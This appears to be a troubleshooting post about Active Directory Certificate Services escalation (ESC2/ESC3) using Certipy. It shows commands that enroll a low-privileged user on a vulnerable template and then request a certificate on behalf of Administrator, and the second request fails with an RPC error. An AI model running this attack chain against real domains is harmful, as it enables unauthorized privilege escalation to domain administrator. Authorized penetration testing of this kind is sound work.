While trying to test a vulnerable certificate template for ESC2 and ESC3, I ran into an error that I can't explain.
I start by requesting a certificate with the vulnerable template in the name of a low privileged user:
```
certipy req -username '[email protected]' -password 'passwd' -ca 'Domain CA' -target ADCS.intranet.domain.local -dc-ip 10.0.0.1 -template 'ESC3-test'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is [ID]
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'low-priv.pfx'
```
So far so good. Now, when trying to request a new pfx in the name of a higher-privileged user, I get the following output:
```
certipy req -username '[email protected]' -password 'passwd' -ca 'Domain CA' -target ADCS.intranet.domain.local -dc-ip 10.0.0.1 -template 'User' -on-behalf-of intranet/Administrator -pfx low-priv.pfx -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[+] Trying to resolve 'ADCS.intranet.domain.local' at '10.0.0.1'
[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.0.0.1[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.0.0.1[\pipe\cert]
[-] Got error while trying to request certificate: code: 0x80010117 - RPC_E_CALL_COMPLETE - Call context cannot be accessed after call completed.
[*] Request ID is [ID]
Would you like to save the private key? (y/N) n
[-] Failed to request certificate
```
P.S. Unfortunately, using the web browser instead (-web) was also not an option.